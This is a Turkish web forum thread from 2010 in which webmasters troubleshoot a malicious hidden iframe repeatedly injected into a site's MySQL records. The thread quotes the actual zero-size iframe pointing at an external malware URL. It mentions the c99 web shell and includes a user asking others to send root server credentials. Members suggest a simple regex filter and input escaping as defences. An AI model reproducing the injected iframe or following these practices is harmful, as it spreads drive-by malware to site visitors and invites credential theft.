mysql'e sızma hakkında yardım edebilecek birileri var mı?

KATILSANA · 5 Nisan 2010

Merhaba arkadaşlar.
Bir sitemin mysql'ine sızarak virüs yaymaya çalışıyorlar. Muhtemelen bir yerde açık var ama henüz bunu bulabilmiş/anlayabilmiş değilim. Ve bu şekilde devam ederse zararlı site uyarısı kaçınılmaz görünüyor. Bir an önce bu problemi çözmem lazım.
Bunun önüne nasıl geçebilirim? Açık nerede olabilir? Veya yardımcı olabilecek birileri var mı?

Şimdiden teşekkürler.

yagmayok · 5 Nisan 2010

Eklenen kod bir html, script kodumudur ?

birde bu eklenen virüs kodunun sitenize kullanıcıların ekleme yaptığı ( yorum ) gibi bir alandan gelme ihtimali var. Bu bölümde gelen bilgileri veya herhangi bir yerdeki değişkenleri ( GET,POST .. ) bir filtreden geçirmiyorsanız kodlar eklenebilir.

KATILSANA · 5 Nisan 2010

Hayır o şekilde gelmiyor.
iframe ile bir siteye yönlendiriliyor.
Kod :

<iframe src="http://bomberoslb.com.ar/logs/index.html" width="0" height="0" frameborder="0"> </iframe>

Z.YÜKSEL · 5 Nisan 2010

hehe.js adında da ekleniyor mu ?

Şuan aynı şekilde benim sitelerden birisinede ekleniyor, npu.ac tarzında js. virüsü, fakat bir türlü çözüm yok.

Invictus · 5 Nisan 2010

mysql a mı ekleniyor yoksa dosyalara mı? biliyorum mysql demişsiniz ama yine de sorayım dedim, çünkü iframe virüsü genelde dosyalara eklenir.

KATILSANA · 5 Nisan 2010

Zeki hayır canım. Sadece iframe var. js dosyası yok. Yine de bir bakayım.

KATILSANA · 5 Nisan 2010

Invictus' Alıntı:
mysql a mı ekleniyor yoksa dosyalara mı? biliyorum mysql demişsiniz ama yine de sorayım dedim, çünkü iframe virüsü genelde dosyalara eklenir.

mysql'e ekleniyor.

Sql'de kayıtlı olan bir konu değiştirilip iframe basılıyor onun yerine. Mesela bir kategori adı var ABC olarak.
O ABC kategorisi direk iframe kodu oluyor.

Invictus · 5 Nisan 2010

PHP:

function noiframe($data) {
    $data = preg_replace('#<iframe.*?</iframe>#si', '', $data);
    return $data;
}

bunu fonksiyon dosyana ekleyip, mysqla eklenen değerleri noiframe($deger); olarak kullanıp iframe kodlarını süzebilirsin

Z.YÜKSEL · 5 Nisan 2010

Bunu yapan pezevengi sende biliyorsun , şerefsiz bizlerin üzerinden adsense kasıyor, benim ie yide kitledi.

MSN geldiğinde görüşelim fakat bu olay scriptle alakası yok bu olayın alakası ortak bizim, geldiğinde görüşelim.

Erturk · 5 Nisan 2010

Invictus' Alıntı:
PHP:

function noiframe($data) { $data = preg_replace('#<iframe.*?</iframe>#si', '', $data); return $data; }

bunu fonksiyon dosyana ekleyip, mysqla eklenen değerleri noiframe($deger); olarak kullanıp iframe kodlarını süzebilirsin

Invictus arkadasımız guzel bir fonksiyon vermiş. Gayet mantıklı. Fakat bunun yerine form uygulamalarından gelen verileri htmlspecialchars(strip_tags($_POST['postadi'])); seklinde süzsenizde kafi olacaktır. Her iki türlüde sıkıntı yasamazsınız.

Z.YÜKSEL · 5 Nisan 2010

Invictus verdiğin kodu deniyelim bakalım.
Fakat sql sorgusu ile halledemezmiyiz bunu ? Yoksa tüm input kullanılan yerlere eklemeye kalkarsak script baya karışık baya güç olucak.

KATILSANA · 5 Nisan 2010

Hemen deneyeceğim.

exe'sini versem, açabilecek bir babayiğit bulunur mu acep?

Erturk · 5 Nisan 2010

Adresi PM lersen acmaya calısırım.

KATILSANA · 5 Nisan 2010

[email protected] MSN adresim. Dileen ekleyebilir arkadaşlar.

kuaza · 5 Nisan 2010

ilk basta shell dusundum ama bunun script acigiyla olusuguna emin oldum simdi

erturk un dedigi gibi gelen verileri suzmenizde fayda var..

Z.YÜKSEL · 5 Nisan 2010

kuaza' Alıntı:
ilk basta shell dusundum ama bunun script acigiyla olusuguna emin oldum simdi erturk un dedigi gibi gelen verileri suzmenizde fayda var..

Açıkcası yazdığınla alakası yok, çünki ben c99 denedim kendi hostumda evet attığımız shell ile config dosyasını okuyabiliyorduk daha sonra o açığı kapattırdık fakat şuan videolarn açıklama kısmına ekliyorlar, bir şekilde giriyorlar fakat nasıl çözebilmiş değiliz, Softlayer sistem mühendisleri tarıyor fakat bir sonuç yok.

kuaza · 5 Nisan 2010

Z.YÜKSEL' Alıntı:
Açıkcası yazdığınla alakası yok, çünki ben c99 denedim kendi hostumda evet attığımız shell ile config dosyasını okuyabiliyorduk daha sonra o açığı kapattırdık fakat şuan videolarn açıklama kısmına ekliyorlar, bir şekilde giriyorlar fakat nasıl çözebilmiş değiliz, Softlayer sistem mühendisleri tarıyor fakat bir sonuç yok.

hocam bir suru shell var, hepsininde farkli gorevleri ve ozellikleri var. cogu shell ile dosyalar uzerinde de oynama yapilabilir. kendiniz soylediniz aradik ama bulamadik diye.. Sonucda geriye tek bir aciklama kaliyor oda adres satirini kullanip get post ile gonderilen verileri kotu amaclar icin kullanilmasi. varsa farkli bir yol daha onuda ben bilmiyorum

Z.YÜKSEL · 5 Nisan 2010

kuaza' Alıntı:
hocam bir suru shell var, hepsininde farkli gorevleri ve ozellikleri var. cogu shell ile dosyalar uzerinde de oynama yapilabilir. kendiniz soylediniz aradik ama bulamadik diye.. Sonucda geriye tek bir aciklama kaliyor oda adres satirini kullanip get post ile gonderilen verileri kotu amaclar icin kullanilmasi. varsa farkli bir yol daha onuda ben bilmiyorum

Aynı şeyi düşünüyoruz aslında, neyse arkadaş bakıyor bakalım, iframe değişkenini engelliyecek komple umarım başarılı olur.

Loi · 5 Nisan 2010

Z.YÜKSEL' Alıntı:
hehe.js adında da ekleniyor mu ?

Şuan aynı şekilde benim sitelerden birisinede ekleniyor, npu.ac tarzında js. virüsü, fakat bir türlü çözüm yok.

Ben bunun için geçiçi çözüm ürettim.
Dedicated sunucusu üzerinde sitelerine bu virus bulaşan varsa daha detaylı inceleyebilirim.

Varsa Dedicated sunucunuz ücretsiz inceleyebilirim.
Root bilgilerinizi, virusun bulaştığı siteyi, ornek konu linklerini gönderin bu aksam inceleyeyim.

Loi · 5 Nisan 2010

KATILSANA' Alıntı:
Hemen deneyeceğim.

exe'sini versem, açabilecek bir babayiğit bulunur mu acep?

Exeyi açtım. Isteyen varsa verebilirim. VB ile yazılmış.

mysql'e sızma hakkında yardım edebilecek birileri var mı?

0

1

0

0

0

0

0

0

0

Erturk

0

0

Erturk

0

0

0

0

0

0

0

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5